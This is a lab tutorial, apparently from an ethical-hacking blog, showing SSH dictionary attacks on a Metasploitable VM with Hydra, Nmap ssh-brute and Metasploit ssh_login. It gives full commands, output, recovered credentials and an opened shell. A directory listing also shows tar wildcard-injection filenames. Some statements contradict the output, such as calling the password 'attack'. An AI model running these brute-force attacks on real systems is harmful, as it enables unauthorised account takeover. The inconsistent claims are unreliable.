  -c TIME   wait time per login attempt over all threads (enforces -t 1)
  -4 / -6   use IPv4 (default) / IPv6 addresses (put always in [] also in -M)
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode 
  -O        use old SSL v2 and v3
  -K        do not redo failed attempts (good for -M mass scanning)
  -q        do not print messages about connection errors
  -U        service module usage details
  -m OPT    options specific for a module, see -U output for information
  -h        more command line options (COMPLETE HELP)
  server    the target: DNS, IP or 192.168.0.0/24 (this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: adam6500 asterisk cisco cisco-enable cvs firebird ftp[s] http[s]-{head|get|post} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] memcached mongodb mssql mysql nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres radmin2 rdp redis rexec rlogin rpcap rsh rtsp s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs.
Licensed under AGPL v3.0. The newest version is always available at;
https://github.com/vanhauser-thc/thc-hydra
Please don't use in military or secret service organizations, or for illegal
purposes. (This is a wish and non-binding - most such people do not care about
laws and ethics anyway - and tell themselves they are one of the good ones.)
These services were not compiled in: afp ncp oracle sapr3 smb2.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY environment variables for a proxy setup.
E.g. % export HYDRA_PROXY=socks5://l:p@127.0.0.1:9150 (or: socks4:// connect://)
     % export HYDRA_PROXY=connect_and_socks_proxylist.txt  (up to 64 entries)
     % export HYDRA_PROXY_HTTP=http://login:pass@proxy:8080
     % export HYDRA_PROXY_HTTP=proxylist.txt  (up to 64 entries)

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
  hydra -l admin -p password ftp://[192.168.0.0/24]/
  hydra -L logins.txt -P pws.txt -M targets.txt ssh
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$                   

We are going to use wordlist /home/hackerboy/Desktop/Penetration-tester-jr/user.txt or rockyou.txt


Now, use the Hydra tool to launch the attack.



Command

hydra -l msfadmin -P /home/hackerboy/Desktop/Penetration-tester-jr/user.txt ssh://192.168.6.45

-l
Login with a single username

-P
Load several passwords from the list

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ hydra -l msfadmin -P /home/hackerboy/Desktop/Penetration-tester-jr/user.txt ssh://192.168.6.45 
Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-12-24 20:33:02
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 13 tasks per 1 server, overall 13 tasks, 13 login tries (l:1/p:13), ~1 try per task
[DATA] attacking ssh://192.168.6.45:22/
[22][ssh] host: 192.168.6.45   login: msfadmin   password: msfadmin
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 1 final worker threads did not complete until end.
[ERROR] 1 target did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-12-24 20:33:05
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$                                                                                                                            

The password for the msfadmin user is msfadmin.

Using Nmap Script


We will run ssh-brute Nmap script to find the password of the "administrator" user.

Password List to be used bydefault via nmap

/usr/share/john/password.lst


/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt

ssh-brute script

ssh-brute.nse is a Nmap script used to launch dictionary attacks on the SSH service.

This script takes a username and password list files. This is useful when the target username is not known to the attacker. However, in this case, we are already aware of the username i.e. "administrator". So, we will create a new file containing only this username.


Command


echo "msfadmin" > users1.txt

NOTE- msfadmin is our username



The password list is "/usr/share/nmap/nselib/data/passwords.lst".

We can now run the script,


Command

nmap -p 22 --script ssh-brute --script-args userdb=/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt 192.168.6.45

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ sudo nmap -p 22 --script ssh-brute --script-args userdb=/home/hackerboy/Desktop/Penetration-tester-jr/user1.txt 192.168.6.45 
[sudo] password for hackerboy: 
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-24 20:35 IST
NSE: [ssh-brute] Trying username/password pair: msfadmin:msfadmin
NSE: [ssh-brute] Trying username/password pair: msfadmin:
NSE: [ssh-brute] Trying username/password pair: msfadmin:123456
NSE: [ssh-brute] Trying username/password pair: msfadmin:12345
NSE: [ssh-brute] Trying username/password pair: msfadmin:123456789
Nmap scan report for 192.168.6.45
Host is up (0.00036s latency).

PORT   STATE SERVICE
22/tcp open  ssh
| ssh-brute: 
|   Accounts: 
|     msfadmin:msfadmin - Valid credentials
|_  Statistics: Performed 5 guesses in 13 seconds, average tps: 0.4
MAC Address: 08:00:27:67:67:30 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 23.21 seconds
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ 

The password of the "msfadmin" user is msfadmin

Using Metasploit

We can use

auxiliary/scanner/ssh/ssh_login

auxiliary module of the Metasploit framework to find the valid password for the "msfadmin" user.

ssh_login module

It is an auxiliary scanner module for ssh service in Metasploit. It also pops up an SSH shell on success.


Start msfconsole in quite mode using
-q
option


Command

msfconsole -q

Use the auxiliary/scanner/ssh/ssh_login module and set all required target details i.e RHOSTS, USERPASS_FILE, STOP_ON_SUCCESS, verbose etc.



Password List

/usr/share/wordlists/metasploit/root_userpass.txt or /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt

 

Command

use auxiliary/scanner/ssh/ssh_login
set RHOSTS demo.ine.local
set USERPASS_FILE /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
set STOP_ON_SUCCESS true
set verbose true
exploit



RHOSTS
: Target IP address

USERPASS_FILE
: Custom Username and Password file i.e user:pass


STOP_ON_SUCCESS
: If set to
true

-the operation stops after finding the working credentials


verbose
: If set to
true

-operation logs will be shown on console 

userpass.txt

msf6 >
msf6 > search ssh_login

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssh/ssh_login                          normal  No     SSH Login Check Scanner
   1  auxiliary/scanner/ssh/ssh_login_pubkey                   normal  No     SSH Public Key Login Scanner


Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_login_pubkey

msf6 > use 0
msf6 auxiliary(scanner/ssh/ssh_login) > 


msf6 auxiliary(scanner/ssh/ssh_login) > 
msf6 auxiliary(scanner/ssh/ssh_login) > 
msf6 auxiliary(scanner/ssh/ssh_login) > 
msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.6.45
RHOSTS => 192.168.6.45
msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
USERPASS_FILE => /home/hackerboy/Desktop/Penetration-tester-jr/userpass.txt
msf6 auxiliary(scanner/ssh/ssh_login) > set STOP_ON_SUCCESS true
STOP_ON_SUCCESS => true
msf6 auxiliary(scanner/ssh/ssh_login) > set verbose true
verbose => true
msf6 auxiliary(scanner/ssh/ssh_login) > exploit

[*] 192.168.6.45:22 - Starting bruteforce
[-] 192.168.6.45:22 - Failed: 'hackerboy:hackerbo'
[-] 192.168.6.45:22 - Failed: 'hackerboy:hacker'
[-] 192.168.6.45:22 - Failed: 'hackerboy:atul'
[-] 192.168.6.45:22 - Failed: 'hackerboy:atulthehackerboy'
[-] 192.168.6.45:22 - Failed: 'hackerboy:fadsg'
[-] 192.168.6.45:22 - Failed: 'hackerboy:fdasg'
[+] 192.168.6.45:22 - Success: 'msfadmin:msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 2 opened (192.168.6.25:42191 -> 192.168.6.45:22 ) at 2021-12-24 20:00:21 +0530
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_login) > 

The password for the "msfadmin" user is attack. The tools have also provided an SSH shell.

Command

sessions

msf6 auxiliary(scanner/ssh/ssh_login) > 
msf6 auxiliary(scanner/ssh/ssh_login) > 
msf6 auxiliary(scanner/ssh/ssh_login) > sessions

Active sessions
===============

  Id  Name  Type         Information                                Connection
  --  ----  ----         -----------                                ----------
  1         shell linux  SSH hackerboy:hackerboy (192.168.6.25:22)  192.168.6.25:41331 -> 192.168.6.25:22  (192.168.6.25)
  2         shell linux  SSH msfadmin:msfadmin (192.168.6.45:22)    192.168.6.25:42191 -> 192.168.6.45:22  (192.168.6.45)

msf6 auxiliary(scanner/ssh/ssh_login) > 

Metasploit framework takes more time for dictionary attacks in comparison to Hydra and Nmap.

We can use the credentials to access the target machine using the SSH command.

SSH to the target machine using the credentials of user "root".

Command

ssh msfadmin@192.168.6.45
<yes>
<attack>
id
whoami
ls -la


 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$                                                                                                                             130 ⨯
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
└─$ ssh msfadmin@192.168.6.45                                                                                                   130 ⨯
The authenticity of host '192.168.6.45 (192.168.6.45)' can't be established.
RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk.
This host key is known by the following other names/addresses:
    ~/.ssh/known_hosts:2: [hashed name]
    ~/.ssh/known_hosts:6: [hashed name]
    ~/.ssh/known_hosts:80: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.6.45' (RSA) to the list of known hosts.
msfadmin@192.168.6.45's password: 
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
No mail.
Last login: Fri Dec 24 09:17:35 2021
msfadmin@metasploitable:~$ id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
msfadmin@metasploitable:~$       
msfadmin@metasploitable:~$ whoami
msfadmin
msfadmin@metasploitable:~$ 
msfadmin@metasploitable:~$ ls -la
total 68
drwxr-xr-x 7 msfadmin msfadmin 4096 2021-07-09 16:15 .
drwxrwxrwx 7 root     root     4096 2021-06-02 05:32 ..
lrwxrwxrwx 1 root     root        9 2012-05-14 00:26 .bash_history -> /dev/null
-rw-r--r-- 1 msfadmin msfadmin    1 2021-06-02 06:04 --checkpoint=1
-rw-r--r-- 1 msfadmin msfadmin    1 2021-06-02 06:03 --checkpoint-action=exec=sh test.sh
-rw-r--r-- 1 msfadmin msfadmin    0 2020-12-05 10:37 data.txt
drwxr-xr-x 4 msfadmin msfadmin 4096 2010-04-17 14:11 .distcc
drwx------ 2 msfadmin msfadmin 4096 2021-07-13 06:25 .gconf
drwx------ 2 msfadmin msfadmin 4096 2021-07-13 06:25 .gconfd
-rw-r--r-- 1 msfadmin msfadmin  891 2021-04-25 08:20 index.html
-rw-r--r-- 1 msfadmin msfadmin  891 2021-04-25 08:20 index.html.1
-rw-r--r-- 1 msfadmin msfadmin   14 2021-04-25 08:22 index.html.2
-rw------- 1 root     root     4174 2012-05-14 02:01 .mysql_history
-rw-r--r-- 1 msfadmin msfadmin  586 2010-03-16 19:12 .profile
-rwx------ 1 msfadmin msfadmin    4 2012-05-20 14:22 .rhosts
drwx------ 2 msfadmin msfadmin 4096 2020-12-05 10:18 .ssh
-rw-r--r-- 1 msfadmin msfadmin    0 2010-05-07 14:38 .sudo_as_admin_successful
-rw-r--r-- 1 msfadmin msfadmin   56 2021-06-02 06:03 test.sh
drwxr-xr-x 6 msfadmin msfadmin 4096 2010-04-27 23:44 vulnerable
msfadmin@metasploitable:~$ 

This is how we can launch dictionary attacks on services using Hydra, Nmap, and Metasploit.

Disclaimer

All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.